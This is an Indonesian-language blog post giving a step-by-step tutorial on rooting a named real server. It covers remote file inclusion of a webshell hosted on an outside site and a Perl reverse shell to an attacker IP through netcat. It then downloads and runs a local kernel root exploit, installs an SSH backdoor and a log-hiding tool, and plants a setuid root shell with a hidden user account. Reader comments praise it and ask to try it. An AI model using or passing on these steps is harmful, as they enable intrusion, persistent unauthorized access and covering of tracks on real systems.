Today : | at : | Safemode : ON
English French German Spain Italian Dutch Russian Brazil Japanese Korean Arabic Chinese Simplified
Title Author Perms Comnt Modified Category
By --=:[./3r0r-c0d3]:=--
Fivers

Tutorial Rooting [./3r0r-c0d3] rwxr-xr-x 11 10:47:00 PM

Title Tutorial Rooting
Permission rw-r--r--
Author [./3r0r-c0d3]
Date and Time 10:47:00 PM
Category
Share
Pada tutor ini, Aq akan mendemonstrasikan gimana get root dari sebuah server.
Dan kebetulan sekali bug nya adalah RFI.

Langsung aja yo.. bigsmile

Peralatan dan perlengkapan.

1. Target --->> http://vrrc.keist.ac.kr/config.php?dir=
2. RFI Injector ( Webshell ) --->> http://prospeedperformance.com/hn.jpg
3. Netcat --->> Untuk backconnect ( google.com )
4. Backconnect.pl --->> http://prospeedperformance.com/backconnect.txt
5. Root Exploit --->> http://tarantula.by.ru/localroot/
6. sshdoor --->> http://prospeedperformance.com/ssh.tar.gz
7. Rem root --->> http://125.251.142.142/zboard/local/rem
8. Root shell backdoor
9. Putty --->> google.com

Langsung aja yo, ga pake lama.

## Inject target dengan RFI Injector

http://vrrc.keist.ac.kr/config.php?dir=h...m/hn.jpg??

Seip..
Masok.. bigsmile
Selanjutnya cari direktori yang bisa kita tulisi ( writeable ) daripada pusing mencarinya.
Langsung aja masuk ke /tmp.
Caranya, itu loh di sebelah kanan atas ada kotak Directory.
Masukkan aja /tmp lalu ketik go.

Seip dah.. p
Sekarang kita berada di direktori /tmp. dimana direktori ini udah pasti writeable. sehingga kita bebas mengupload file di direktori ini.

Step selanjutnya adalah upload backconnect.pl ke shell. dalam hal ini, Aq membuat file tersebut ( tidak mengupload or wget , karena ya suka-suka donk.. p

Untuk membuat file, masukkan backconnect.pl di kotak create lalu klik create.

Pada tampilan yang keluar, masukkan backconnect.pl pada kotak yang tersedia. dimana file backconnect.pl….???

Setelah dimasukkan tekan tombol save yang ada diatas. tunggu loading sampe muncul tulisan save.
Karena backconect.pl udah Aq upload, jadi tinggal download ajjah.


Lwp-download http://prospeedperformance.com/backconnect.txt

Berikutnya, kita lakuka backconnect dari shell ke kompi kita. Kenapa Aq memilih backconnect, bukan bind..??
Karena bind terkadang tertutup firewall sehinggs gagal, jadi Aq pilih backconnect ajjah banyak berhasilnya. bigsmile bigsmile bigsmile

Okeh..
Set dulu netcat dalam mode listening, dalam contoh Aq ngeset ke port 6788

nc-vlp 6788

seeipp..
next step, lakukan backconnect dengan script backconnect kita tadi, buka lagi webshell, dan jalankan perintah backconnect.

perl backconnect.txt 222.236.47.23 6788

Seiiippp.
Setelah klik execute, tidak perlu menunggu lama, buka kembali console / cmd kamu ( netcat yang listening tadi lowh ).
Lihat, shell sudah terkoneksi dengan kita, kita sudah mendapatkan akses shell interaktif dengan target kita.

Perhatikan versi kernelnya. Yang mana..??
Ketik ajjah uname –a ntar keluar kernelnya.

Cari tau linux yang di pake doi apa.

cat /etc/issue

misal Linux Debian dengan kernel 2.4.18 tahun 2002.. hahahaiii.. 
mengetahui tahun penting, karena kernel yang mudah di root adalah tahun 2006 ke bawah, yang keatas masih sulit.. bigsmile

berikutnya, cari exploit yang sesuai di http://tarantula.by.ru/localroot/

naaahh..
itu dia ada, masuk ke direktorinya.

Ada beberapa pilihan exploit, Aq pake kesukaanku aja, brk2
Copy aja link ke file itu, download ke shell.

Lwp-download http://tarantula.by.ru/localroot.2.4.18/brk2

Tunggu download selesai.
Setelah selesai, coba ls –la ( filename ) untuk mengecek file tersebut benar² terdownload or kagak.

Perhatikan, file tersimpan dengan nama brk2.cc
Cek file tersebut apakah benar² terdownload.

ls –la brk2.cc

Wokeh..
Next step, jalankan exploit.
Exploit harus permission executable, caranya chmod 777 brk2.cc, kemudian baru jalankan exploitnya.

chmod 777 brk2.cc
./brk2.cc
su
id

Tunggu beberapa saat sampai menunjukkan id kita adalah root, kadang mencapai waktu yang lama.
Sabar ya, pipis dulu biar gak bocor ntar kalo dapet root.

Beberapa saat setelah menunggu, akhirnya..

Horeeeeeeeeeeeeeeeeee…. Dapet root.. ( guling….guling…guling…guling… )

Next..
Install backdoor, backdoor di gunakan sebagai pintu kita masuk lagi nanti, kita pakai sshdoor

Install sshdoor :

Download dulu : lwp-download http://prospeedperformance.com/ssh.tar.gz
extract file : tar –zxf ssh.tar.gz
go dir : cd sshdoor
set perm executable : chmod 777 * -R
install : ./install ( password port ) -->> ./install jc 9657 <<-- install sshdoor dengan password, dengan bind ke port 9657.
Tunggu sampai selesai.

Seiiipppp…
Selese sudah install sshdoor, berikutnya kita check apakah port 9657 ( yang kita bind dengan sshdoor tadi lowh )

telnet ke target dengan port 9657

telnet 143.248.249.224 9657
connected, tandanya port 9657 terbuka. Berarti sshdoor sukses terinstall.

Dari step ini, kita sudah menanam backdoor di server target. Sekarang kita konek ke server target dengan ssh.

ssh 143.248.249.224 -p 9657 -l root

untuk pertama kali login akan dimintai pengaktifan fingerprint rsa, yes ajjah.

Ketika dimintai password, masukkan password kita tadi, yaitu jc

Seiipp..

Untuk pengguna windus pake putty

Next, rem root.. ini agar kegiatan kita tidak di log dan sekaligus hidden access.

Installasi

goto /usr/bin : cd /usr/bin
download : lwp-download http://125.251.142.142/zboard/local/rem
set perm : chmod 755 rem
run : rem root
pilih mode : a

seipp..
perhatikan, ada satu langkah
mv rem.txt rem

langkah itu dilakukan karena lwp-download menyimpan file dalam nama rem.txt.
jadi kita rename manjadi rem saja.

Yap..
Selese, but gimana kalo ternyata kita tidak bisa ngebind port pas install sshdoor..??
Apakah kita akan meninggalkan server yang berhasil kita root begitu saja..?? Tidak

Ada alternative lain untuk backdooring root.

Langsung ajjah kita buat root backdoornya.

touch rsh.c

echo ‘int main() { ‘ > rsh.c
echo ‘setregid(0,0);’ >> rsh.c
echo ‘setreuid(0,0);’ >> rsh.c
echo ‘setgroups(0,0);’ >> rsh.c
echo ‘system(“/bin/sh”);’ >> rsh.c
echo ‘}’ >> rsh.c
echo “ >> rsh.c

gcc -o /usr/bin/rsh rsh.c

rm -f rsh.c

chmod 4755 /usr/bin/rsh

chown root:root /usr/bin/rsh

next adduser dengan shellnya /usr/bin/rsh

useradd www -d /root -g 0 -G 0 -s /usr/bin/rsh
passwd www
selese.. p
mari kita coba ssh ke port 22 dengan user www
karena kita tidak ngebind ke port, berarti kita menggunakan ssh nya dia secara default, yaitu ke port 22.
Langsung ajjah login.


11 komentar:

Nurmayanti Zain mengatakan...

nice info!

Black Angel Syndicate mengatakan...

wah nice info sob... makasih atas tutorialnya :D
Absen siang

[./3r0r-c0d3] mengatakan...

@Nurmayanti Zain

Thank

[./3r0r-c0d3] mengatakan...

@Nurmayanti Zain

Thank

[./3r0r-c0d3] mengatakan...

@Black Angel Syndicate yukk marii soob :D

XP-Files mengatakan...

wah info yang bagus nih sobat.. izin praktek :)

[./3r0r-c0d3] mengatakan...

@XP-Files Silahkan k-wan :))

Unknown mengatakan...

hadir kembali sob dan izin nyimak kembali :D
Absen siang

[./3r0r-c0d3] mengatakan...

@Rama Arif Maulana Silahkan puas2in sob...

:D

NandoCyber4rt mengatakan...

wee keren sob, ini yang ane cari
ane bookmark dolo

[./3r0r-c0d3] mengatakan...

@NandoCyber4rt Silahkan dnikmati sobat ^^

Posting Komentar

terimakasih telah berkomentar dengan bijak, saya harap anda memberi kritik dan saran yang membangun...

Happy Reading ^_^

Diberdayakan oleh Blogger.